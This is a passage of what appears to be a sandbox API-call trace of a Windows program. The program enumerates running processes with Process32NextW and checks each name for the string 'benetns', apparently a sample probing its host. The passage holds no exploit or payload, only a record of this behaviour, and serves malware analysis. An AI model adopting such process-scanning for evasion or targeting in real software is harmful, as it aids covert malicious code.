(uFlags=0x40, uBytes=0xd) returned 0x3581ee0 [0177.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3581ee0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0177.584] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0177.584] StrStrIA (lpFirst="explorer.exe", lpSrch="benetns") returned 0x0 [0177.585] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0177.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.586] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595e68 [0177.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3595e68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0177.586] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0177.586] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="benetns") returned 0x0 [0177.586] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0177.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0177.587] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x35865e8 [0177.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x35865e8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0177.587] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0177.587] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="benetns") returned 0x0 [0177.588] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0177.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0177.589] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595e08 [0177.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3595e08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0177.589] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0177.589] StrStrIA (lpFirst="Memory Compression", lpSrch="benetns") returned 0x0 [0177.589] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0177.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.590] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581f28 [0177.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3581f28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0177.590] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0177.590] StrStrIA (lpFirst="SearchUI.exe", lpSrch="benetns") returned 0x0 [0177.590] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0177.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0177.592] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3595e88 [0177.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3595e88, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0177.592] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0177.592] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="benetns") returned 0x0 [0177.592] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.593] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581f88 [0177.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3581f88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0177.594] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0177.594] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="benetns") returned 0x0 [0177.594] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0177.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.595] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581fe8 [0177.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3581fe8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0177.595] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0177.595] StrStrIA (lpFirst="pending.exe", lpSrch="benetns") returned 0x0 [0177.595] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0177.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0177.596] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x35863e0 [0177.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x35863e0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0177.597] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0177.597] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="benetns") returned 0x0 [0177.597] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0177.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.598] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3595aa8 [0177.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3595aa8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0177.598] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0177.598] StrStrIA (lpFirst="swing prefer.exe", lpSrch="benetns") returned 0x0 [0177.598] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0177.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0177.599] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3586610 [0177.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x3586610, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0177.599] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0177.600] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="benetns") returned 0x0 [0177.600] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0177.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.601] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595b28 [0177.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3595b28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0177.601] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0177.601] StrStrIA (lpFirst="nights-attending.exe", lpSrch="benetns") returned 0x0 [0177.601] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0177.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.602] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3581fa0 [0177.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3581fa0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0177.602] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0177.602] StrStrIA (lpFirst="installed.exe", lpSrch="benetns") returned 0x0 [0177.603] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0177.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0177.604] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3586638 [0177.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x3586638, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0177.604] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0177.604] StrStrIA (lpFirst="references compounds.exe", lpSrch="benetns") returned 0x0 [0177.604] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0177.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.605] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595b48 [0177.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3595b48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0177.605] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0177.605] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="benetns") returned 0x0 [0177.605] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0177.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0177.607] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595b68 [0177.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3595b68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0177.607] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0177.607] StrStrIA (lpFirst="registered try.exe", lpSrch="benetns") returned 0x0 [0177.607] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0177.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0177.608] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x35861b0 [0177.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x35861b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0177.609] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0177.609] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="benetns") returned 0x0 [0177.609] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0177.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.610] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3582000 [0177.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3582000, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0177.610] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0177.610] StrStrIA (lpFirst="invite.exe", lpSrch="benetns") returned 0x0 [0177.610] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0177.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.611] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35820c0 [0177.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x35820c0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0177.612] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0177.612] StrStrIA (lpFirst="idol.exe", lpSrch="benetns") returned 0x0 [0177.612] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0177.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0177.613] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3586228 [0177.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x3586228, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0177.613] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0177.613] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="benetns") returned 0x0 [0177.613] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0177.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0177.614] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x35862c8 [0177.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x35862c8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0177.615] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0177.615] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="benetns") returned 0x0 [0177.615] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0177.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0177.616] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3582048 [0177.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3582048, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0177.616] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0177.616] StrStrIA (lpFirst="powell_jane.exe", lpSrch="benetns") returned 0x0 [0177.616] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0177.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.617] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595bc8 [0177.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3595bc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0177.617] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0177.618] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="benetns") returned 0x0 [0177.618] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, 